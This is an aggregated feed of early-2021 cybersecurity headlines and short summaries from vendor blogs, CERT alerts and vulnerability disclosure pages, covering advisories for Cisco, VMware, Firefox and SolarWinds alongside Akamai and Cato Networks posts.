https://www.catonetworks.com/blog/putting-aiops-with-sase-to-use/
The Tao of Continuous Integration
2021-02-26T15:31:47Z | 1614353507

It is a truism in modern software development that a robust continuous integration (CI) system is necessary. But many projects suffer from CI that feels brittle, frustrates developers, and actively impedes development velocity. Why is this? What can you do to avoid the common CI pitfalls? Continuous Integration Needs a Purpose CI […]

https://blog.trailofbits.com/2021/02/26/the-tao-of-continuous-integration/
Optimizing For Performance, One Hire at a Time: Part 3
2021-02-25T05:00:00Z | 1614229200

Having previously decided we need to make a new hire onto our team, part 1 of this series examined how to meet the needs of our team going into the future, instead of just adding surface visible technical skills.

https://www.akamai.com/blog/security/optimizing-for-performance-one-hire-at-a-time-part-3
Akamai's New ESG Office: A Catalyst for Environmental and Social Progress
2021-02-25T05:00:00Z | 1614229200

We're proud of the progress Akamai has made in environmental, social, and governance (ESG) performance.

https://www.akamai.com/blog/culture/akamais-new-esg-office-a-catalyst-for-environmental-and-social-progress
Security Alert (A21-02-10): Multiple Vulnerabilities in Cisco Products
2021-02-25T04:00:00Z | 1614225600

Cisco released security advisories to address multiple vulnerabilities in Cisco Application Services Engine, Cisco products running NX-OS, Cisco products running FX-OS and Cisco Nexus 9000 Series.

https://www.govcert.gov.hk/en/alerts_detail.php
CVE-2021-27406
2021-02-25T00:00:00Z | 1614211200

EXTERNAL CONTROL OF SYSTEM OR CONFIGURATION SETTING CWE-15 An attacker can take leverage on this architecture and send the config command from any application running on the local host machine to force the back-end server into initializing a new open-VPN instance with arbitrary open-VPN configuration. This could result in the attacker achieving execution with privileges of a SYSTEM user. Read more: "All Roads Lead to OpenVPN: Pwning Industrial Remote Access Clients"

https://claroty.com/team82/disclosure-dashboard/cve-2021-27406
What?s new in Guardicore Centra R26
2021-02-24T14:00:00Z | 1614175200

New improvements to Guardicore Centra make it the fastest and simplest solution to protect against ransomware and meet the needs of zero trust.

https://www.akamai.com/blog/security/centra-update-r26
2021 Networking Survey: The Future of Enterprise Networking and Security: Are You Ready for the Next Leap?
2021-02-24T12:56:27Z | 1614171387

The post 2021 Networking Survey: The Future of Enterprise Networking and Security: Are You Ready for the Next Leap? appeared first on Cato Networks.

https://www.catonetworks.com/resources/2021-networking-survey-the-future-of-enterprise-networking-and-security-are-you-ready-for-the-next-leap/
High Threat Security Alert (A21-02-08): Multiple Vulnerabilities in VMware Products
2021-02-24T04:00:00Z | 1614139200

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A21-02-09): Multiple vulnerabilities in Firefox
2021-02-24T04:00:00Z | 1614139200

Mozilla has published the advisories (MFSA 2021-07 and MFSA 2021-08) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Slic3r libslic3r Obj File TriangleMesh::TriangleMesh() out-of-bounds read vulnerability
2021-02-24T00:00:00Z | 1614124800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1213
CGAL libcgal multiple code execution vulnerabilities in Nef polygon-parsing code
2021-02-24T00:00:00Z | 1614124800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1225
Why Large Enterprises Moved to Cato in 2020
2021-02-23T05:53:44Z | 1614059624

Today, Cato reported its 2020 financial results. On the surface, the results might seem to simply mark the strong financial growth that’s come to define Cato: over 200 percent bookings growth for the fourth consecutive year, a more than $1B valuation, and an additional $130 million funding round. But just as significant as the financial... The post Why Large Enterprises Moved to Cato in 2020 appeared first on Cato Networks.

https://www.catonetworks.com/blog/why-large-enterprises-moved-to-cato-in-2020/
Bitcoins, Blockchains, and Botnets
2021-02-23T05:00:00Z | 1614056400

A recent piece of malware from a known crypto mining botnet campaign has started leveraging Bitcoin blockchain transactions in order to hide its backup C2 IP address. It's a simple, yet effective, way to defeat takedown attempts.

https://www.akamai.com/blog/security/bitcoins--blockchains--and-botnets
Openscad import_stl.cc:import_stl() out-of-bounds stack write vulnerability
2021-02-23T00:00:00Z | 1614038400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1224
Openscad import_stl.cc:import_stl() stack-based buffer overflow vulnerability
2021-02-23T00:00:00Z | 1614038400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1223
IT Managers Share Lessons Learned From Shifting to Work-from-Home
2021-02-22T16:04:52Z | 1614009892

The post IT Managers Share Lessons Learned From Shifting to Work-from-Home appeared first on Cato Networks.

https://www.catonetworks.com/resources/it-managers-share-lessons-learned-from-shifting-to-work-from-home/
Happy Hunting: A New Approach to Finding Malware Cross-Correlates Threat Intelligence Feeds to Reduce Detection Time
2021-02-21T14:06:55Z | 1613916415

With SOC teams inundated by thousands of security alerts every day, CISOs, SOC managers and researchers need more effective means of prioritizing security alerts. Best practices have urged us to start with alerts on the most critical resources. Such an approach, though, while valid, can leave security analysts chasing after millions of alerts, many that... The post Happy Hunting: A New Approach to Finding Malware Cross-Correlates Threat Intelligence Feeds to Reduce Detection Time appeared first on Cato Networks.

https://www.catonetworks.com/blog/approach-to-finding-malware-cross-correlates-threat-intelligence-feeds-to-reduce-detection-time/
Serving up zero-knowledge proofs
2021-02-19T11:59:31Z | 1613735971

Zero-knowledge (ZK) proofs are gaining popularity, and exciting new applications for this technology are emerging, particularly in the blockchain space. So we’d like to shine a spotlight on an interesting source of implementation bugs that we’ve seen—the Fiat Shamir transformation. A ZK proof can be either interactive, where the […]

https://blog.trailofbits.com/2021/02/19/serving-up-zero-knowledge-proofs/
Out of My Depth (Where I Belong)
2021-02-19T05:00:00Z | 1613710800

I remember well my first day as a member of Akamai's InfoSec department. The Friday prior, I'd just completed the Akamai Technical Academy, a five-month crash-course in all things tech, and was now, on a cold but sunny Monday morning, joining InfoSec for their weekly staff meeting. Eager to make a good first impression, I took a seat at the large, crowded conference table, opened my notebook, and started to take notes.

https://www.akamai.com/blog/security/out-of-my-depth-where-i-belong
Sytech XL reporter installation privilege escalation vulnerability
2021-02-19T00:00:00Z | 1613692800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1167
Massive Campaign Targeting UK Banks Bypassing 2FA
2021-02-18T05:00:00Z | 1613624400

On 14 July, 2020, Oliver Hough, a security researcher from Cyjax, published a report centered on a phishing campaign targeting banking customers in the United Kingdom, which evades two-factor authentication (2FA).

https://www.akamai.com/blog/security/massive-campaign-targeting-uk-banks-bypassing-2fa
Can Edge Computing Exist Without the Edge? Part 3: The Economics of Edge Computing
2021-02-18T05:00:00Z | 1613624400

Do the math. For the past decade, digital businesses have been investing in digital transformation initiatives. The promise is to increase top-line growth while maximizing customer lifetime value. As infrastructure improves, IT spending is shifting from the cloud to the edge. But while edge computing makes headlines, can you expect a meaningful return?

https://www.akamai.com/blog/edge/can-edge-computing-exist-without-the-edge-part-3-the-economics-of-edge-computing
Our Role in Inclusion, Diversity, and Engagement
2021-02-18T05:00:00Z | 1613624400

The work of creating the most inclusive and diverse organization is never-ending. While that may seem daunting to some, I see it as exhilarating. Sure, I say that from the perspective of VP! But at Akamai, Inclusion, Diversity, & Engagement (ID&E) is a set of habits that belong to us all, and it's a commitment we should proudly share.

https://www.akamai.com/blog/culture/our-role-in-inclusion-diversity-engagement-by-khalil-smith
Security Alert (A21-02-07): Vulnerability in ISC BIND
2021-02-18T04:00:00Z | 1613620800

ISC has released a security update to fix a vulnerability in BIND.

https://www.govcert.gov.hk/en/alerts_detail.php
UK supports US charges against North Korean cyber actors
2021-02-17T16:58:30Z | 1613581110

Indictment charges individuals with involvement in hacking and fraud conspiracy

https://www.ncsc.gov.uk/news/uk-supports-us-charges-against-north-korean-cyber-actors
AIOps and SASE – A Match Made in the Cloud
2021-02-16T12:39:21Z | 1613479161

Imagine handling a vacation booking at The Venetian without the right hotel management software. It’s hard to even picture the time, effort and resources needed for basic actions like verifying a room’s availability, knowing when a room is clean for early check-in, granting guests independent access to hotel facilities without key cards, calculating the cost... The post AIOps and SASE – A Match Made in the Cloud appeared first on Cato Networks.

https://www.catonetworks.com/blog/aiops-and-sase/
SolarWinds Hack and the Case of DNS Security
2021-02-16T05:00:00Z | 1613451600

It's not news that some of the top government agencies and companies in the world were victims of the SolarWinds attack. At this point, I can say it's the reason I didn't have a smoother transition back into work-life following a long vacation. As I understand it, the breaches happened after malicious code was inserted into a software patch that was downloaded by the companies and agencies. The installation of the patch executed malicious code, called SUNBURST, which created an entry point for other malicious codes (TEARDROP/RAINDROP). These additional codes were used to allow attackers to move laterally within the network and exfiltrate sensitive customer information to a public command and control server.

https://www.akamai.com/blog/security/solarwinds-hack-and-the-case-of-dns-security
Advantech WebAccess/SCADA installation local file inclusion
2021-02-16T00:00:00Z | 1613433600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1168
Advantech WebAccess/SCADA installation privilege escalation vulnerability
2021-02-16T00:00:00Z | 1613433600

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1169
How to Improve Elasticsearch Performance by 20x for Multitenant, Real-Time Architectures
2021-02-14T16:16:17Z | 1613319377

A bit more than a year ago, Cato introduced, Instant*Insight (also called “Event Discovery”) to the Cato Secure Access Service Edge (SASE) platform. Instant*Insight are SIEM-like capabilities that improve our customers’ visibility and investigation capabilities into their Cato account. They can now mine millions of events for insights, returning the results to their console in... The post How to Improve Elasticsearch Performance by 20x for Multitenant, Real-Time Architectures appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-to-improve-elasticsearch-performance-by-20x-for-multitenant-real-time-architectures/
Threat actors are testing the waters with (not so) new attacks against ICS systems
2021-02-12T06:39:40Z | 1613111980

Earlier this week, the city of Oldsmar, FL reported a breach of their water supply system resulting in a water poisoning attempt that was luckily detected and mitigated. ICS (Industrial Control Systems) have been the target of threat actors for years now due to their remote connectivity needs combined with the lack of security monitoring,... The post Threat actors are testing the waters with (not so) new attacks against ICS systems appeared first on Cato Networks.

https://www.catonetworks.com/blog/threats-and-attacks-against-ics-systems/
NHS Vaccine Scams: Criminals Still Targeting COVID-19 Anxiety
2021-02-11T05:00:00Z | 1613019600

It's 2021, but the anxiety, fear, uncertainty, and stress caused by the COVID-19 pandemic in 2020 is very much alive today.

https://www.akamai.com/blog/security/nhs-vaccine-scams-criminals-still-targeting-covid-19-anxiety
Credential Stuffing and Account Takeover -- The Business View
2021-02-11T05:00:00Z | 1613019600

Account takeovers (ATOs), in which criminals impersonate legitimate account owners in order to take control of an account, cause tremendous pain for businesses in all industries. This pain may be monetary, such as losses from stolen accounts, but may also include a number of related problems, like regulatory and legal issues, lost customers, and the inability to gain new consumers due to a lack of trust. Losses from ATOs and new account fraud are estimated at more than $10 billion annually in the United States alone.

https://www.akamai.com/blog/security/credential-stuffing-and-account-takeovers-the-business-view
CVE-2021-22665
2021-02-11T00:00:00Z | 1613001600

UNCONTROLLED SEARCH PATH ELEMENT CWE-427 DriveTools and Drives AOP both contain a vulnerability that a local attacker with limited privileges may be able to exploit resulting in privilege escalation and complete control of the system.

https://claroty.com/team82/disclosure-dashboard/cve-2021-22665
IPCDump ? Guardicore?s New Open-Source Tool for Linux IPC Inspection
2021-02-10T14:00:00Z | 1612965600

IPCdump allows software based firewall developers, researchers, and linux users to explore the Inter-process-communication (IPC) channels.

https://www.akamai.com/blog/security/ipcdump-guardicores-new-open-source-tool-for-linux-ipc-inspection
1. märtsist ei saa teatud riiklikesse e-teenustesse pangalingi kaudu siseneda
2021-02-10T07:45:55Z | 1612943155

Riigi infosüsteemi amet (RIA) sulgeb 1. märtsist riigi autentimisteenuses pangalingi kaudu sisse logimise. See tähendab, et kasutaja ei saa panga PIN-kalkulaatorit, salasõna või biomeetriat kasutades siseneda osasse riigi e-teenustesse, näiteks riigiportaali. Jätkuvalt saab e-teenustesse sisse logida ID-kaardi, mobiil-ID või Smart-IDga.

https://ria.ee/uudised/1-martsist-ei-saa-teatud-riiklikesse-e-teenustesse-pangalingi-kaudu-siseneda
Optimizing for Performance, One Hire at a Time: Part 1
2021-02-10T05:00:00Z | 1612933200

It's a lot of fun to imagine and design the best team. As managers, it's rare that we get to build a team from the ground up and all at once.

https://www.akamai.com/blog/security/optimizing-for-performance-one-hire-at-a-time-part-1
Gambling, Social Media, and 10 Years of Streaming the 'Big Game'
2021-02-10T05:00:00Z | 1612933200

Thanks to the unique perspectives we have via the Akamai Intelligent Edge Platform, we're able to observe massive amounts of web traffic and data that provide insights across the various industries Akamai serves. In the wake of Super Bowl LV, we're sharing some observations on gambling traffic and social media activity, two categories that are complementary to the game. We'll also look at how online viewing has increased over the past 10 years of live streaming the

https://www.akamai.com/blog/performance/gambling-social-media-and-ten-years-of-super-bowl-streaming
High Threat Security Alert (A21-02-05): Multiple Vulnerabilities in Microsoft Products (February 2021)
2021-02-10T04:00:00Z | 1612929600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-02-06): Multiple Vulnerabilities in Adobe Reader/Acrobat
2021-02-10T04:00:00Z | 1612929600

Security updates are released for Adobe Reader and Acrobat to address multiple vulnerabilities.

https://www.govcert.gov.hk/en/alerts_detail.php
Guest Blog Post: Good First Steps to Find Security Bugs in Fenix (Part 2)
2021-02-09T15:17:42Z | 1612883862

This blog post is one of several guest blog posts, where we invite participants of our bug bounty program to write about bugs they’ve reported to us. Continuing with … Read more

https://blog.mozilla.org/attack-and-defense/2021/02/09/guest-blog-post-good-first-steps-to-find-security-bugs-in-fenix-part-2/
Emotet Botnet: What It Means for You
2021-02-09T07:15:30Z | 1612854930

The Emotet botnet was taken down last week thanks to a coordinated international effort. Considered one of the most prolific malware botnets, Emotet evolved from a banking trojan to a pay-per-infection business, showcasing advanced spreading techniques. While we might see a dip in global malware infections in the short term due to the takedown of... The post Emotet Botnet: What It Means for You appeared first on Cato Networks.

https://www.catonetworks.com/blog/emotet-botnet-what-it-means-for-you/
Command Injection on a D-Link Router
2021-02-09T05:00:00Z | 1612846800

During the COVID-19 pandemic, I wanted to extend the local WiFi in my home to reach all the floors. The goal was to have full connectivity from every location in the house.

https://www.akamai.com/blog/security/command-injection-on-a-d-link-router
Holiday Season Phishing Attacks on the Rise
2021-02-09T05:00:00Z | 1612846800

Phishing continues to be a major attack vector, and it's surprising just how many security incidents and breaches start with an employee clicking on a link in a carefully crafted phishing email (and sometimes doing the same with a not-so-well crafted phishing email -- see this example).

https://www.akamai.com/blog/security/phishing-holiday-season-attacks-on-the-rise
Krakow Internship
2021-02-09T05:00:00Z | 1612846800

The beginning of a new year is a time to look back and reflect on the previous one. December 31st is also the end date of our annual Krakow Internship Program.

https://www.akamai.com/blog/culture/krakow-internship
Security Alert (A21-02-04): Vulnerability in Firefox
2021-02-09T04:00:00Z | 1612843200

Mozilla has published an advisory (MFSA 2021-06) to address a vulnerability in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Accusoft ImageGear SGI RLE decompression out-of-bounds write vulnerability
2021-02-09T00:00:00Z | 1612828800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1182
Accusoft ImageGear TIFF index record out-of-bounds write vulnerability
2021-02-09T00:00:00Z | 1612828800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1176
Accusoft ImageGear PSD Header processing out-of-bounds write vulnerability
2021-02-09T00:00:00Z | 1612828800

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1196
CVE-2019-18255
2021-02-09T00:00:00Z | 1612828800

INCORRECT PERMISSION ASSIGNMENT FOR CRITICAL RESOURCE CWE-732 The affected product allows a local authenticated user to modify system-wide iFIX configurations through the registry. This may allow privilege escalation.

https://claroty.com/team82/disclosure-dashboard/cve-2019-18255
Edge Redirector Cloudlet Gets Faster
2021-02-08T05:00:00Z | 1612760400

Cloudlets Policy Manager often takes a long time to load, which is a by-product of its original design where every policy activation is an individual file. These files must be moved around the network, and as you might imagine, transferring thousands of files in a multi-tenant network can take a very long time. Add a synchronous API to this problem, and we quickly get into a situation where the Policy Manager UI can freeze until a back-end transfer operation times out.

https://www.akamai.com/blog/performance/edge-redirector-cloudlet-gets-faster
Inspiring the Next Generation with DigiGirlz
2021-02-08T05:00:00Z | 1612760400

DigiGirlz is an initiative organized by Microsoft to engage girls in technological education and careers. The initiative, which launched in 2000, consists of two main programs: DigiGirlz Day and High Tech Camp. This program has been a cornerstone of Microsoft's community engagement for more than 20 years, but this year the events were in jeopardy of being cancelled because of the pandemic. So, what do you do when your passion for helping others meets a challenge? You do what Microsoft does so well -- you innovate!

https://www.akamai.com/blog/culture/inspiring-the-next-generation-with-digigirlz
Security Alert (A21-02-02): Multiple Vulnerabilities in Cisco Products
2021-02-08T04:00:00Z | 1612756800

Cisco released security advisories to address multiple vulnerabilities in Cisco product running Cisco IOS XR, NX-OS, UCS Central software, and Cisco Small Business RV series routers.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A21-02-03): Vulnerability in Google Chrome
2021-02-08T04:00:00Z | 1612756800

Google released a security update to address a heap buffer overflow vulnerability in the JavaScript and WebAssembly engine V8 of the Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
VoIP, DiffServ, and QoS: Don’t Be Held Captive by Old School Networking
2021-02-07T15:22:39Z | 1612711359

We frequently talk to organizations who are enthusiastically searching for alternatives to their old and tired MPLS and IPsec networks. They’re ready to realize the benefits of a new SASE infrastructure but remain constrained by their old beliefs about network engineering. Last year, for example, we spoke to an organization that wanted to replace its... The post VoIP, DiffServ, and QoS: Don’t Be Held Captive by Old School Networking appeared first on Cato Networks.

https://www.catonetworks.com/blog/voip-diffserv-and-qos-dont-be-held-captive-by-old-school-networking/
Confessions of a smart contract paper reviewer
2021-02-05T11:59:10Z | 1612526350

If you’re thinking of writing a paper describing an exciting novel approach to smart contract analysis and want to know what reviewers will be looking for, you’ve come to the right place. Deadlines for many big conferences (ISSTA tool papers, ASE, FSE, etc.) are approaching, as is our own Workshop on Smart Contract Analysis, so […]

https://blog.trailofbits.com/2021/02/05/confessions-of-a-smart-contract-paper-reviewer/
Discover new cyber exercise ideas with our new publication
2021-02-05T07:12:53Z | 1612509173

Our new Cyber Exercise Scenarios for 2021 publication contains a range of realistic threat scenarios from a payment system data leak to a large-scale epidemic. The scenarios are designed to help organisations identify the most suitable potential threats for their cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/discover-new-cyber-exercise-ideas-our-new-publication
Discover new cyber exercise ideas with our new publication
2021-02-05T07:12:53Z | 1612509173

Our new Cyber Exercise Scenarios for 2021 publication contains a range of realistic threat scenarios from a payment system data leak to a large-scale epidemic. The scenarios are designed to help organisations identify the most suitable potential threats for their cyber exercises.

https://www.kyberturvallisuuskeskus.fi/en/news/discover-new-cyber-exercise-ideas-our-new-publication
10 cyber security developments to look out for in 2021
2021-02-05T07:00:05Z | 1612508405

The near future looks bleak for information security, says a new NCSC-FI forecast. While the Vastaamo data breach turned the spotlight on questions of security and responsibility in the context of online services, this year will likely see more incidents. Many organisations are placing a growing emphasis on information security when building their online services, and regulators are looking to increase stability. Despite these measures, we are unlikely to completely avoid scams or cyber attacks.

https://www.kyberturvallisuuskeskus.fi/en/news/10-cyber-security-developments-look-out-2021
10 cyber security developments to look out for in 2021
2021-02-05T07:00:05Z | 1612508405

The near future looks bleak for information security, says a new NCSC-FI forecast. While the Vastaamo data breach turned the spotlight on questions of security and responsibility in the context of online services, this year will likely see more incidents. Many organisations are placing a growing emphasis on information security when building their online services, and regulators are looking to increase stability. Despite these measures, we are unlikely to completely avoid scams or cyber attacks.

https://www.kyberturvallisuuskeskus.fi/en/news/10-cyber-security-developments-look-out-2021
Deadline approaches for inspections of user environments for the secondary use of health and social data — two inspection bodies qualified to carry out the assessments
2021-02-05T06:56:40Z | 1612508200

Deadline approaches for inspections of user environments for the secondary use of health and social data — two inspection bodies qualified to carry out the assessments

https://www.kyberturvallisuuskeskus.fi/en/news/deadline-approaches-inspections-user-environments-secondary-use-health-and-social-data-two
Deadline approaches for inspections of user environments for the secondary use of health and social data — two inspection bodies qualified to carry out the assessments
2021-02-05T06:56:40Z | 1612508200

Deadline approaches for inspections of user environments for the secondary use of health and social data — two inspection bodies qualified to carry out the assessments

https://www.kyberturvallisuuskeskus.fi/en/news/deadline-approaches-inspections-user-environments-secondary-use-health-and-social-data-two
Accusoft ImageGear GIF LZW decoder heap overflow vulnerability
2021-02-05T00:00:00Z | 1612483200

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1183
Opportunity to participate in the construction of a prototype PRS timing receiver
2021-02-04T14:11:36Z | 1612447896

Finnish industrial companies now have the opportunity to participate in the design and construction of a prototype GNSS receiver that utilises Galileo PRS signals.

https://www.kyberturvallisuuskeskus.fi/en/news/opportunity-participate-construction-prototype-prs-timing-receiver
Opportunity to participate in the construction of a prototype PRS timing receiver
2021-02-04T14:11:36Z | 1612447896

Finnish industrial companies now have the opportunity to participate in the design and construction of a prototype GNSS receiver that utilises Galileo PRS signals.

https://www.kyberturvallisuuskeskus.fi/en/news/opportunity-participate-construction-prototype-prs-timing-receiver
High Threat Security Alert (A21-02-01): Multiple Vulnerabilities in SolarWinds Orion Platform software
2021-02-04T04:00:00Z | 1612411200

SolarWinds has released security updates to address the vulnerability "SUNBURST" on Orion Platform software as well as the malware "SUPERNOVA" which exploits another vulnerability in SolarWinds Orion Platform software.

https://www.govcert.gov.hk/en/alerts_detail.php
RIA koos partneritega parandas ID-kaardi brauserilaienduses kriitilise vea
2021-02-03T10:55:24Z | 1612349724

RIA uuendas jaanuari lõpus ID-kaardi brauserilaiendust (plugin), et parandada kriitiline viga, mille aitasid avastada Tartu Ülikooli teadlased. ID-tarkvara (ID-Updater) annab kasutajatele märku, kui on vaja tarkvara uuendada. Kui tarkvara veel ei kuva automaatse uuendamise teadet, siis saab uue versioon alla laadida ID.ee kodulehelt.

https://ria.ee/uudised/ria-koos-partneritega-parandas-id-kaardi-brauserilaienduses-kriitilise-vea
SoftMaker Office PlanMaker Excel document record 0x00fc memory corruption vulnerability
2021-02-03T00:00:00Z | 1612310400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1197
SoftMaker Office PlanMaker Document Records 0x8011 and 0x820a integer overflow vulnerability
2021-02-03T00:00:00Z | 1612310400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1190
SoftMaker Office PlanMaker Document Record 0x8010 out-of-bounds write vulnerability
2021-02-03T00:00:00Z | 1612310400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1191
SoftMaker Office PlanMaker Excel document CEscherObject::ReadNativeProperties multiple heap buffer overflow vulnerabilities
2021-02-03T00:00:00Z | 1612310400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1210
SoftMaker Office PlanMaker Document Record 0x800d memory corruption vulnerability
2021-02-03T00:00:00Z | 1612310400

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1192
Riiklik küberüksus CERT-EE on jätkuvalt maailma parimate hulgas
2021-02-02T14:24:56Z | 1612275896

Riigi Infosüsteemi Ameti küberintsidentide käsitlemise osakond ehk CERT-EE tähistas 1.1.2021 oma 15. sünnipäeva ning sai auga väljateenitud sünnipäevakingitusena sertifitseerimistunnistuse, millega kuulub maailma üheksa tunnustatuima riikliku küberüksuse hulka.

https://ria.ee/uudised/riiklik-kuberuksus-cert-ee-jatkuvalt-maailma-parimate-hulgas
PDF is Broken: a justCTF Challenge
2021-02-02T12:50:28Z | 1612270228

Trail of Bits sponsored the recent justCTF competition, and our engineers helped craft several of the challenges, including D0cker, Go-fs, Pinata, Oracles, and 25519. In this post we’re going to cover another of our challenges, titled PDF is broken, and so is this file. It demonstrates some of the PDF file format’s idiosyncrasies in a […]

https://blog.trailofbits.com/2021/02/02/pdf-is-broken-a-justctf-challenge/
Approximately 1,000 automation equipment remain unprotected in Finnish networks
2021-02-02T09:44:31Z | 1612259071

Once again, we mapped the security of Finnish networks by looking for unprotected automation equipment online. In 2020, we detected approximately one thousand of them. This is consistent with the figures from previous years. Automation equipment include automation control systems, various display panels and systems used for building management.

https://www.kyberturvallisuuskeskus.fi/en/news/approximately-1000-automation-equipment-remain-unprotected-finnish-networks
Approximately 1,000 automation equipment remain unprotected in Finnish networks
2021-02-02T09:44:31Z | 1612259071

Once again, we mapped the security of Finnish networks by looking for unprotected automation equipment online. In 2020, we detected approximately one thousand of them. This is consistent with the figures from previous years. Automation equipment include automation control systems, various display panels and systems used for building management.

https://www.kyberturvallisuuskeskus.fi/en/news/approximately-1000-automation-equipment-remain-unprotected-finnish-networks
Allen-Bradley Flex IO 1794-AENT/B ENIP Request Path Network Segment Denial of Service Vulnerability
2021-02-02T00:00:00Z | 1612224000

https://talosintelligence.com/vulnerability_reports/TALOS-2020-1008
SASE vs. SD-WAN: Achieving Cloud-Native WAN Security
2021-02-01T16:08:02Z | 1612195682

For several years now, the network evolution spotlight has been on SD-WAN, and rightfully so. SD-WAN provides big advancements in connecting branch locations into central data centers in a cost-effective manner. It is the networking equivalent of a killer application that allows companies to use a variety of transport mechanisms besides MPLS and to steer... The post SASE vs. SD-WAN: Achieving Cloud-Native WAN Security appeared first on Cato Networks.

https://www.catonetworks.com/blog/sase-vs-sd-wan-achieving-cloud-native-wan-security/
National Cyber Security Centre Finland supporting critical operators when cyber attacks occur
2021-02-01T07:11:13Z | 1612163473

Several targeted cyber attacks have occurred all over the world this year. National Cyber Security Centre Finland helps operators critical to emergency supply and central government in observing and processing serious data security breaches.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finland-supporting-critical-operators-when-cyber-attacks-occur
National Cyber Security Centre Finland supporting critical operators when cyber attacks occur
2021-02-01T07:11:13Z | 1612163473

Several targeted cyber attacks have occurred all over the world this year. National Cyber Security Centre Finland helps operators critical to emergency supply and central government in observing and processing serious data security breaches.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finland-supporting-critical-operators-when-cyber-attacks-occur
Akamai + Fingerbank: How an open source community can transform security
2021-02-01T05:00:00Z | 1612155600

Isn't it amazing how seemingly simple decisions can have far-reaching effects? When the Inverse team in Montreal took over PacketFence in 2008, it was an open source (OS) solution.

https://www.akamai.com/blog/news/akamai-fingerbank-how-an-open-source-community-can-transform-security
The pragmatic security leader’s guide to deception technology
2021-02-01T04:04:10Z | 1612152250

When evaluating deception technology, look at three key components of the solution to ascertain how effective it will be in your environment – visibility, realism, and fingerprintability.

https://www.smokescreen.io/the-pragmatic-security-leaders-guide-to-deception-technology/
Pangad harjutasid koostöös RIA ja Eesti Pangaga reageerimist ulatuslikule küberründele
2021-01-29T09:26:37Z | 1611912397

Eilsel suurõppusel CredITex 2021 mängiti läbi pankade vastu suunatud laiaulatusliku küberrünnaku lahendamine. Õppusel osalenud pangad, Riigi Infosüsteemi Amet (RIA), Pangaliit ja Eesti Pank harjutasid koostööd rünnaku tõrjumisel ja selle tagajärgedega toimetulekul, samuti testiti erinevate reeglite ja protseduuride ajakohasust.

https://ria.ee/uudised/pangad-harjutasid-koostoos-ria-ja-eesti-pangaga-reageerimist-ulatuslikule-kuberrundele
Transmitting e-mail and sending samples to the National Cyber Security Centre Finland
2021-01-29T07:59:34Z | 1611907174

If you suspect that you have been targeted in an information security breach or you have received suspect e-mail or a strange text message, you can send these messages to the National Cyber Security Centre Finland for investigation. All of the information that may be extracted from the message must be sent to the centre along with the message. You can ensure the authenticity of the message and the conveyance of all the necessary information in its original form to the recipient by following instructions issued by us.

https://www.kyberturvallisuuskeskus.fi/en/news/transmitting-e-mail-and-sending-samples-national-cyber-security-centre-finland
Transmitting e-mail and sending samples to the National Cyber Security Centre Finland
2021-01-29T07:59:34Z | 1611907174

If you suspect that you have been targeted in an information security breach or you have received suspect e-mail or a strange text message, you can send these messages to the National Cyber Security Centre Finland for investigation. All of the information that may be extracted from the message must be sent to the centre along with the message. You can ensure the authenticity of the message and the conveyance of all the necessary information in its original form to the recipient by following instructions issued by us.

https://www.kyberturvallisuuskeskus.fi/en/news/transmitting-e-mail-and-sending-samples-national-cyber-security-centre-finland
Sustainability Requires Collaboration: Akamai's Growing Community and Supply Chain Initiatives
2021-01-29T05:00:00Z | 1611896400

Akamai is committed to collaboration that inspires worldwide change. We know it's not enough to be environmentally conscious solely in our own business. To make a true impact on climate change, we need to use our unique position as a global corporation to encourage our partners to join us in taking sustainable action, participating in community improvement projects, and engaging in climate education. We need to consider the question:

https://www.akamai.com/blog/culture/sustainability-requires-collaboration-akamais-growing-community-and-supply-chain-initiatives
The Importance of Education in Furthering the Sustainability Agenda
2021-01-29T05:00:00Z | 1611896400

Author: Mark Porter, Director, Supply Chain & International Collaboration, Renewable Energy Buyers Alliance (REBA) Mark Porter moved to REBA from Rocky Mountain Institute's Business Renewables Center (BRC) initiative in March 2019. Mark continues to support the BRC initiative across all areas and grow REBA's membership. He is developing initiatives to support supply chain engagement and international collaboration between NGOs acting in this space worldwide.

https://www.akamai.com/blog/culture/the-importance-of-education-in-furthering-the-sustainability-agenda
High Threat Security Alert (A21-01-09): Multiple Vulnerabilities in SonicWall SMA 100 Series Products
2021-01-29T04:00:00Z | 1611892800

SonicWall has released a security advisory about probable zero-day vulnerabilities in SMA 100 Series products.

https://www.govcert.gov.hk/en/alerts_detail.php
O malware mais perigoso do mundo, Emotet, foi interrompido através de uma ação global
2021-01-29T00:00:00Z | 1611878400

